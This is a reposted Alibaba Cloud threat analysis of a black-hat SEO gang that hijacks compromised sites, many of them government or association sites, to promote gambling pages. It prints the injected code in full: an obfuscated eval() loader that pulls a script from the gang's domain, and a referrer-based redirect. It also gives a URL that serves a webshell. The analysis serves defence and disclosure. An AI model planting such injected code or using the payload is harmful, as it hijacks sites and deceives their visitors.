从入侵到变现——“黑洞”下的黑帽SEO分析

news/2024/5/15 2:35:39/文章来源:https://blog.csdn.net/zhaowei121/article/details/89496524

概述

由于互联网入口流量主要被搜索引擎占据,网站在搜索引擎中的排名直接影响到市场营销效果,因此SEO服务应运而生。SEO(Search Engine Optimization)全称为搜索引擎优化,是指利用搜索引擎的规则提高网站在相关搜索引擎内的自然排名。SEO服务分为两种:一种是合法的技术手段,通过站内优化、站外优化、内容建设等合理手段提升网站排名;第二种是使用作弊手段快速提升网站在搜索引擎内的排名,比如使用蜘蛛池、暗链、站群、客户端劫持、服务端劫持等黑客技术手段,这种通常称为黑帽SEO。

黑帽SEO服务的对象通常为非法的产品或网站。与合法的SEO技术服务相比,黑帽SEO的效果非常快速,能够在短时间内提升排名进行快速推广,且推广的网站内容不受法律约束。黑客的主要目标是牟取非法的经济利益,黑帽SEO是黑客快速变现的重要手段。在地下网络世界已经形成了一条完整的黑色产业链:黑客利用网站存在的安全漏洞,通过入侵手段获取网站的控制权并植入后门,将后门出售给黑帽SEO运营者,黑帽SEO通过暗链、网站劫持等技术手段篡改网站内容,为黄、赌、赌等非法站点进行搜索引擎推广。

阿里云安全团队于近日跟踪到了一个利用web漏洞入侵网站并通过劫持网站首页进行批量SEO推广的黑产团伙 。此黑产团伙控制网站数量巨大,推广的网站多为非法的博彩类网站,对互联网产业存在巨大的危害。被入侵网站往往被植入多个后门,可被黑客重复利用,成为黑产的牟利工具,存在巨大的安全风险。该黑产团伙的上游黑客组织掌握了大量IP基础设施,为了绕过安全防御,每天使用数千个代理/秒拨IP进行疯狂入侵。

由于该黑产团伙控制的外部链接域名注册邮箱均为dasheng123123@gmail.com,因此我们将其命名为DaSheng。

被控制网站分布

经过长期跟踪发现,仅2019年1月到3月,该黑产团伙就控制并利用了至少12700个站点。从被植入暗链网页的顶级域名分布来看,".com"占比最多,占总数的72%。被植入暗链的网站存在为数不少的非营利组织/政府网站,绝大部分为地方性行业协会网站,但也有像中国XXX发展研究中、中国XXX发展联盟等全国性协会网站。行业协会/政府网站具有较高公信力,黑帽SEO“傍”上这些网站能够在搜索引擎里快速提高排名,但是发布的“黄赌毒“信息严重影响了网站的公信力。网站存在暗链也意味着存在严重的安全漏洞,如果不及时修复有可能引发重大的网络安全事件。

图1:被劫持网站顶级域名分布

图1:被劫持网站顶级域名分布

图2:某政府网站被植入暗链

图2:某政府网站被植入暗链

黑帽SEO手法分析

该黑产团伙通过被入侵网站的webshell后门在网站首页的头部插入如下代码,该代码会修改页面title、keywords、description,并判断浏览者是否是百度搜索引擎,如果不是搜索引擎则将网站titile修改为合法内容,以达到隐藏自己的目的:

<title>&#21271;&#20140;&#36187;&#36710;&#23448;&#32593;&#24320;&#22870;&#95;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#32593;&#31449;&#12304;&#23454;&#26102;&#26356;&#26032;&#12305;</title>
<meta name="keywords" content="&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#32467;&#26524;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#35760;&#24405;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#32593;&#31449;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#30452;&#25773;&#24179;&#21488;&#44;&#21271;&#20140;&#36187;&#36710;&#23448;&#26041;&#24320;&#22870;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#32467;&#26524;&#35760;&#24405;"/>
<meta name="description" content="&#21271;&#20140;&#36187;&#36710;&#23448;&#26041;&#24320;&#22870;&#32593;&#31449;&#12304;&#89;&#89;&#50;&#51;&#52;&#46;&#67;&#79;&#77;&#12305;&#44;&#26102;&#26102;&#31934;&#20934;&#25552;&#20379;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#35760;&#24405;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#35270;&#39057;&#44;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#32467;&#26524;&#44;&#21271;&#20140;&#36187;&#36710;&#22312;&#32447;&#30452;&#25773;&#44;&#25171;&#36896;&#20840;&#32593;&#26368;&#20339;&#30340;&#21271;&#20140;&#36187;&#36710;&#24320;&#22870;&#30452;&#25773;&#24179;&#21488;"/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="LEO YOUNG 李洋地板- By Orange NT"}</script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0 \\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))
</script>

被修改的内容通过HTML的ASCII编码隐藏,还原后为常见的博彩类关键词:

titile:北京赛车官网开奖北京赛车开奖网站【实时更新】
keywords:北京赛车开奖结果北京赛车开奖记录北京赛车开奖网站北京赛车开奖直播北京赛车开奖直播平台北京赛车官方开奖北京赛车开奖结果记录
description:北京赛车官方开奖网站【】时时精准提供北京赛车开奖记录北京赛车开奖视频北京赛车开奖结果北京赛车在线直播打造全网最佳的北京赛车开奖直播平台

第二段js脚本是经过混淆编码的,执行后得到新的js,并链接到黑产团伙控制的外部javascript

< script type = "text/javascript" > eval(function(p, a, c, k, e, d) {e = function(c) {return (c < a ?"": e(parseInt(c / a))) + ((c = c % a) > 35 ?String.fromCharCode(c + 29) : c.toString(36))};if (!''.replace(/^/, String)) {while (c--) d[e(c)] = k[c] || e(c);k = [function(e) {return d[e]}];e = function() {return '\\w+'};c = 1;};while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);return p;
} ('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0 \\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6 \\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');', 29, 29, 'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'), 0, {})) < /script>
/

执行后的js:

<script type="text/javascript" src="https://www.cpdas8.com/ylc.js"></script>

该js代码会自动向百度站长平台和360站长平台推送网页内容,并通过referrer判断浏览者是否来自搜索引擎,如果是则跳转到真实的被推广网站。

(function () {/*百度推送代码*/var bp = document.createElement('script');bp.src = '//push.zhanzhang.baidu.com/push.js';var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(bp, s);/*360推送代码*/var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';document.write('<script src="' + src + '" id="sozz"><\/script>');})();document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://2019c2.com\";");
document.writeln("</script>");
wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

我们在搜索引擎中搜索其推广的暗链关键词,可以看到多个被入侵的网站在搜索引擎处在排名靠前的位置。

图3:被黑帽SEO篡改的合法网站

图3:被黑帽SEO篡改的合法网站

攻击向量

黑帽SEO团伙使用的webshell后门通常是由上游的黑客组织提供,经阿里云安全团队研究跟踪到了DaSheng的最大“供货商”。该黑客团伙从2019年1月份开始变得异常活跃,主要使用2018年爆发的2个Thinkphp5远程代码执行漏洞,偶尔也会使用其它的web漏洞。根据其使用的webshell文件名和主要的入侵方式,我们将其命名为ThinkphpDD。

该团伙的攻击payload中会从http://43.255.29.112/php/dd.txt下载恶意代码,该代码是一个webshell后门。通常入侵成功几天之后就会被DaSheng黑产团伙利用,为了能够长期控制站点,DaSheng会在被入侵网站的不同目录植入多个webshell后门,该后门具备较强的免杀性。

 

图4:被植入的webshell后门

图4:被植入的webshell后门

黑客团伙使用的攻击payload:

IP基础设施

通常攻击者使用的IP由于存在恶意攻击行为会被IPS、防火墙等安全设备拦截。ThinkphpDD为了绕过安全防护获取最大的利益,使用了大量IP进行网络攻击,从2019年1月开始每天使用几千个IP进行攻击。而且使用的IP复用率低,被该团伙利用过的IP已超过10万个。使用过的IP绝大部分来自中国,占比89%。结合阿里云的代理IP威胁情报,至少有86%的IP是匿名代理或秒拨IP。可见该团伙为了获取黑产利益投入巨大。

图5:黑客使用的IP数量趋势

图5:黑客使用的IP数量趋势

图6:黑客攻击次数趋势

图6:黑客攻击次数趋势

图7:黑客使用的IP国家分布

图7:黑客使用的IP国家分布

图8:黑客使用的IP来源分布

图8:黑客使用的IP来源分布

安全建议

1、用户应及时更新服务,或修补网站漏洞,避免成为入侵的受害者;

2、用户可对网站源代码进行检测,及时清理被植入的网站后门、恶意代码;

3、建议使用阿里云安全的下一代云防火墙产品,能够及时阻断恶意攻击、配置智能策略,能够有效帮助防御入侵;

4、对于有更高定制化要求的用户,可以考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务,定制适合您的方案,帮助加固系统,预防入侵。

IOCs

www[.]cpdas8[.]com
www[.]bcdas8[.]com
www[.]dasv8[.]com
43.255.29.112

 



本文作者:桑铎

原文链接

本文为云栖社区原创内容,未经允许不得转载。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_752928.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Confluence 6 创建站点的导出文件

希望为你的站点创建一个 XML 导出文件&#xff1a; 进入 > 基本配置&#xff08;General Configuration&#xff09; > 备份和恢复&#xff08;Backup & Restore&#xff09;。选择 归档到备份目录&#xff08;Archive to backups folder&#xff09; 来存储备份文件…

赚钱新招 Facebook准备在移动网站卖广告

北京时间1月27日消息&#xff0c;Facebook在本周宣布&#xff0c;将与出版商合作在移动网站上销售广告&#xff0c;目前已经有多家出版商测试了移动网络广告服务。 此前&#xff0c;Facebook推出了“Audience Network”&#xff0c;其可以在移动APP上销售和放置广告&#xff0c…

软件架构设计学习总结(10):大型网站技术架构(四)网站的高性能架构

网站性能是客观的指标&#xff0c;可以具体体现到响应时间、吞吐量、并发数、性能计数器等技术指标。 1、性能测试指标 1.1 响应时间 指应用执行一个操作需要的时间&#xff0c;指从发出请求到最后收到响应数据所需要的时间。如下列出了系统常用的操作响应时间表. 操作 响应时…

一个tomcat怎样添加多个域名开多个站点(网站国际化)

参考&#xff1a;https://jingyan.baidu.com/article/546ae1857986f71149f28cf6.html /home/apache-tomcat-8.5.46/conf/server.xml 配置修改&#xff0c;新增三个HOST段 <Alias>www.xxxx.com.cn</Alias> <Valve className"org.apache.catalina.valves.Ac…

网站安全服务浅谈用户密码暴力破解

网站安全里&#xff0c;用户密码被暴力破解&#xff0c;尤其网站的用户登录页面&#xff0c;以及网站后台管理登录页面&#xff0c;都会遭到攻击者的暴力破解&#xff0c;常见的网站攻击分SQL语句注入攻击&#xff0c;密码弱口令攻击&#xff0c;用户密码暴力破解攻击&#xff…

建站干货|建设外贸网站需要注重哪些方面?

建设外贸网站需要注重哪些方面&#xff1f;根据广州爱搜客多年的外贸型网站建设经验&#xff0c;建议你可以参考以下几个方面做起&#xff1a; 第一点&#xff1b;需要明确目的 有些人说&#xff0c;外贸网站不就是给展示自己的公司产品信息嘛&#xff0c;但是我们要清楚一点…

PrestaShop 1.7 如何添加网站的跟踪代码

在 PrestaShop 创建购物车的时候&#xff0c;我们希望 PrestaShop 能够跟踪用户的访问。 比如说使用 Google Analytics 或者 matomo 来对购物车网站进行跟踪&#xff0c;如何进行操作和进行配置呢&#xff1f; 这里有一些捷径可以去做。如果你安装 Matomo 的话&#xff0c;你可…

IIS网站发布

考试系统中代码不断地更新&#xff0c;每一次都涉及到网站的发布&#xff0c;次数多了&#xff0c;也就成了一件平常的事情&#xff0c;必须学会&#xff0c;当主管服务器的人不在的时候&#xff0c;我们都可以着手去做这些事情。 首先就是要把代码拷贝到服务器上&#xff0c;…

Uirush | 免费的设计开发素材库网站

Uirush 素材库 uirush.net 资源分类包括&#xff1a;UI Kits、网页、图标、字体、框线图、模型、PSD、平面&#xff0c;还有代码。 下载时需在电脑端操作。 资源每周更新。 - END - 西瓜设计研究所 互联网创业 | UI设计 | 开发资源 | 教程 未经允许请勿转载&#xff0c;烦…

难怪你做事每次都比别人快,原来用了这黑科技网站,请低调收藏!

1. 别样网经常有人因为盗图而被告&#xff0c;在这里是不存在的&#xff0c;精彩纷呈的图片海量随你挑选&#xff0c;而且里面的图片像素非常的高。2. Owllook非常强大的电子书资源搜索网站&#xff0c;而且里面的小说是免费的&#xff0c;页面整洁无广告。基本上你搜的小说它都…

如何把某个网站的SSL Server certificate链导入到ABAP Netweaver系统里

我们在用ABAP代码消费外网的url时会遇到一些异常&#xff0c;比如ICM_HTTP_SSL_PEER_CERT_UNTRUSTED&#xff0c;这是因为请求的url所在的网站的SSL Server certificate没有导入到Netweaver系统。 本文介绍导入的详细步骤。 基本思路就是两步&#xff1a; 从网站上导出certific…

Docsify 如何添加 Google analytics 或者其他的网站跟踪代码

希望了解你的文档被访问了多少次或者有多么受欢迎吗&#xff1f; 你可用在你的 Docsify 项目中添加 Google analytics 或者其他的网站跟踪代码。 找到你的 Docsify 文档中&#xff0c;找到 index.html 这个文件。 然后非常简单的将跟踪代码拷贝到最下面 之前就可以了。 然后…

降低网站跳出率的六个方法(亲身使用)

摘要&#xff1a;前一段时间网站跳出率一直在80%左右&#xff0c;我不确定这是否跟360网站卫士有关&#xff0c;但确实是从接入360网站卫士之后开始的。网站跳出率高可不是一件好事情&#xff0c;所以针对跳出率我展开了一番“折腾”&#xff0c;截止今日&#xff0c;我觉得我有…

一元建站-基于函数计算 + wordpress 构建 serverless 网站

前言 本文旨在通过 快速部署一个 wordpress 网站到阿里云函数计算平台 这个示例来展示 serverless web 新的开发模式, 包括 FUN 工具一键初始化 NAS, 同步网站到 NAS, 一键部署等能力&#xff0c; 展现函数计算的开发敏捷特性、自动弹性伸缩能力、免运维和完善的监控设施。 相…

Edge 浏览器如何查看当前网站的 SSL 证书

有时候我们可能需要在浏览器上查看当前网站的 SSL 证书以确定是否配置正确了。 Edege 查看方法 单击网站 URL 链接地址的锁的标志。 如果你访问的网站是 https 的话&#xff0c;这个标志就会出现&#xff0c;否则你的网站就不是使用 https 的。 然后在下面的链接中将会显示当…

Edge 浏览器如何查看当前网站的 SSL 证书

有时候我们可能需要在浏览器上查看当前网站的 SSL 证书以确定是否配置正确了。 Edege 查看方法 单击网站 URL 链接地址的锁的标志。 如果你访问的网站是 https 的话&#xff0c;这个标志就会出现&#xff0c;否则你的网站就不是使用 https 的。 然后在下面的链接中将会显示当…

Nancy之给我们的网站添加自定义图标

原文:Nancy之给我们的网站添加自定义图标当我们在做一个网站时&#xff0c;可能经常会有这样一个需求&#xff0c;要给我们做的网站添加一个自定义的图标。 在Nancy中&#xff0c;默认是的下面这样 一个妹子的头像&#xff0c;其实也是挺好看的&#xff01;&#xff01; 那么当…

struts2架构网站漏洞修复详情与利用漏洞修复方案

struts2从开发出来到现在&#xff0c;很多互联网企业&#xff0c;公司&#xff0c;平台都在使用apache struts2系统来开发网站&#xff0c;以及应用系统&#xff0c;这几年来因为使用较多&#xff0c;被攻击者挖掘出来的struts2漏洞也越来越&#xff0c;从最一开始S2-001到现在…

借助 Lucene.Net 构建站内搜索引擎(上)

前言&#xff1a;最近翻开了之前老杨&#xff08;杨中科&#xff09;的Lucene.Net站内搜索项目的教学视频&#xff0c;于是作为老杨脑残粉的我又跟着复习了一遍&#xff0c;学习途中做了一些笔记也就成了接下来您看到的这篇博文&#xff0c;仅仅是我的个人笔记&#xff0c;大神…